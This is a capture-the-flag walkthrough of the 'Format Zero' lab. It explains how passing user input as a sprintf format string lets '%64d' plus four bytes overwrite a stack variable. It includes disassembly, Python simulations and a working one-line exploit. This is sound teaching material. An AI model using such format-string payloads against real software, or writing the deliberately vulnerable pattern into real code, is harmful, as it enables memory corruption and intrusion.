# Format Zero

> This level introduces format strings, and how attacker-supplied format strings can modify the execution flow of programs.
>
> **Hints**
>
> * This level should be done in less than 10 bytes of input.
> * “Exploiting format string vulnerabilities”

## Source code

```c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
  volatile int target;
  char buffer[64];

  target = 0;

  sprintf(buffer, string);
  
  if(target == 0xdeadbeef) {
      printf("you have hit the target correctly :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}
```

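The program expects one user-supplied argument, which `main` passes straight to `vuln` via `vuln(argv[1]);`.

`vuln` then hands that argument to `sprintf` as the format string, which is where the vulnerability lies. The `sprintf` man page warns about exactly this: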

> **Bugs**
>
> Because **sprintf**() and **vsprintf**() assume an arbitrarily long string, callers must be careful not to overflow the actual space; this is often impossible to assure. Note that the length of the strings produced is locale-dependent and difficult to predict. Use **snprintf**() and **vsnprintf**() instead (or **[asprintf](https://linux.die.net/man/3/asprintf)**(3) and **[vasprintf](https://linux.die.net/man/3/vasprintf)**(3)).
>
> Linux libc4.[45] does not have a **snprintf**(), but provides a libbsd that contains an **snprintf**() equivalent to **sprintf**(), that is, one that ignores the _size_ argument. Thus, the use of **snprintf**() with early libc4 leads to serious security problems.
>
> Code such as **printf(**_foo_**);** often indicates a bug, since _foo_ may contain a % character. If _foo_ comes from untrusted user input, it may contain **%n**, causing the **printf**() call to write to memory and creating a security hole.

Before we exploit the program, we need to know how the stack is laid out.

Let's disassemble the `vuln` function.

```
(gdb) disass vuln
Dump of assembler code for function vuln:
0x080483f4 <vuln+0>:    push   ebp
0x080483f5 <vuln+1>:    mov    ebp,esp
0x080483f7 <vuln+3>:    sub    esp,0x68
0x080483fa <vuln+6>:    mov    DWORD PTR [ebp-0xc],0x0
0x08048401 <vuln+13>:   mov    eax,DWORD PTR [ebp+0x8]
0x08048404 <vuln+16>:   mov    DWORD PTR [esp+0x4],eax
0x08048408 <vuln+20>:   lea    eax,[ebp-0x4c]
0x0804840b <vuln+23>:   mov    DWORD PTR [esp],eax
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
0x08048413 <vuln+31>:   mov    eax,DWORD PTR [ebp-0xc]
0x08048416 <vuln+34>:   cmp    eax,0xdeadbeef
0x0804841b <vuln+39>:   jne    0x8048429 <vuln+53>
0x0804841d <vuln+41>:   mov    DWORD PTR [esp],0x8048510
0x08048424 <vuln+48>:   call   0x8048330 <puts@plt>
0x08048429 <vuln+53>:   leave
0x0804842a <vuln+54>:   ret
```

We can see that the line at `vuln+26` makes the call to `sprintf`.

```
--snip--;
0x08048408 <vuln+20>:   lea    eax,[ebp-0x4c]
0x0804840b <vuln+23>:   mov    DWORD PTR [esp],eax
0x0804840e <vuln+26>:   call   0x8048300 <sprintf@plt>
--snip--;
```

The first argument, the address `ebp-0x4c`, is loaded into `eax` and then stored at the top of the stack (`[esp]`).

The `sprintf` prototype in the man page shows that the first argument is a pointer to the destination buffer, so `buffer` starts at `ebp-0x4c`.

```c
int sprintf(char *restrict s, const char *restrict format, ...);
```

Looking back at the disassembly of `vuln`, a comparison is made at `vuln+34`.

```
--snip--;

0x08048413 <vuln+31>:   mov    eax,DWORD PTR [ebp-0xc]
0x08048416 <vuln+34>:   cmp    eax,0xdeadbeef

--snip--;
```

This checks whether the `target` variable equals `0xdeadbeef`. The value being compared is loaded from `ebp-0xc`, so that is where `target` lives.

So we know the location of the `buffer` as well as the `target` variable. Let's find the distance between them.

```
(gdb) p/d 0x4c - 0xc
$1 = 64
```

So the distance is 64 bytes, but the hint says the level should be solved with less than 10 bytes of input, which means a classic buffer overflow will not work.
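The same arithmetic can be double-checked outside gdb. This is a minimal sketch that uses only the two `ebp`-relative offsets read from the disassembly; the variable names are illustrative and not part of the challenge.

```python
# ebp-relative offsets read from the disassembly of vuln()
BUFFER_OFFSET = 0x4C  # buffer starts at ebp-0x4c
TARGET_OFFSET = 0x0C  # target lives at ebp-0xc

# Number of bytes between the start of buffer and the start of target
distance = BUFFER_OFFSET - TARGET_OFFSET

# A plain overflow needs `distance` filler bytes plus the 4-byte value
overflow_len = distance + 4

print(distance)      # 64
print(overflow_len)  # 68, far more than the 10 bytes the hint allows
```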

This is where the [format string attack](https://owasp.org/www-community/attacks/Format_string_attack) comes in.

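Instead of submitting 64 bytes of padding, we can submit the conversion specifier `%64d`, which `sprintf` expands into 64 characters: an integer right-aligned in a field 64 characters wide. No matching argument is supplied, so `sprintf` formats whatever value happens to sit in the next argument slot on the stack; the field width guarantees 64 characters of output either way.

When `sprintf` is executed, those 64 characters fill `buffer`, and the four bytes that follow the specifier in our input are copied verbatim into the next four bytes of the stack, overwriting the `target` variable.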
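The effect on the stack frame can be modelled in a few lines. This is only a simulation, not the real `sprintf`: `toy_sprintf` is a hypothetical helper that understands a single leading `%<width>d` and copies everything else verbatim, and the stray argument is assumed to be `0` (on the real binary it is whatever value is on the stack). The frame layout (64 bytes of `buffer` followed by 4 bytes of `target`) comes from the offsets found above.

```python
import struct

def toy_sprintf(fmt: bytes, stray_arg: int = 0) -> bytes:
    """Toy stand-in for sprintf: expands one leading %<width>d only."""
    assert fmt.startswith(b"%")
    d = fmt.index(b"d")                  # end of the conversion specifier
    width = int(fmt[1:d])                # field width, e.g. 64
    padded = str(stray_arg).rjust(width).encode("ascii")
    # Bytes after the specifier are copied as-is; sprintf appends a NUL
    return padded + fmt[d + 1:] + b"\x00"

# 8 bytes of input: the specifier plus the little-endian target value
payload = b"%64d" + struct.pack("<I", 0xDEADBEEF)

# Model of the frame: buffer [0:64], target [64:68], 4 spare bytes after it
frame = bytearray(72)
out = toy_sprintf(payload)
frame[:len(out)] = out                   # "sprintf" writes from buffer[0] upward

target = struct.unpack_from("<I", frame, 64)[0]
print(len(payload), len(out))            # 8 69
print(hex(target))                       # 0xdeadbeef
```

Eight bytes of input turn into 69 bytes of output, which is why the level can be solved within the 10-byte hint.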

## Exploit

```
$ ./format0 $(python -c 'print "%64d\xef\xbe\xad\xde"')
you have hit the target correctly :)
```
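The one-liner above uses Python 2 `print` syntax. As a rough Python 3 equivalent, the payload can be built as `bytes`; `build_payload` is a hypothetical helper name, and the sketch only prints the payload's representation rather than running the binary.

```python
import struct

def build_payload(width: int = 64, value: int = 0xDEADBEEF) -> bytes:
    """Return b'%<width>d' followed by `value` as a 32-bit little-endian word."""
    return b"%" + str(width).encode("ascii") + b"d" + struct.pack("<I", value)

payload = build_payload()

print(payload)       # b'%64d\xef\xbe\xad\xde'
print(len(payload))  # 8
```

The payload contains no NUL or whitespace bytes, so it survives being passed as a single command-line argument. When emitting it from Python 3, writing the raw bytes with `sys.stdout.buffer.write(payload)` is safer than `print`, which would encode the text rather than output the bytes unchanged.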

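Note that other conversion specifiers that accept a field width (for example `%64x`) can be used in place of `%64d`; the OWASP page on the [format string attack](https://owasp.org/www-community/attacks/Format_string_attack) lists the available specifiers.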

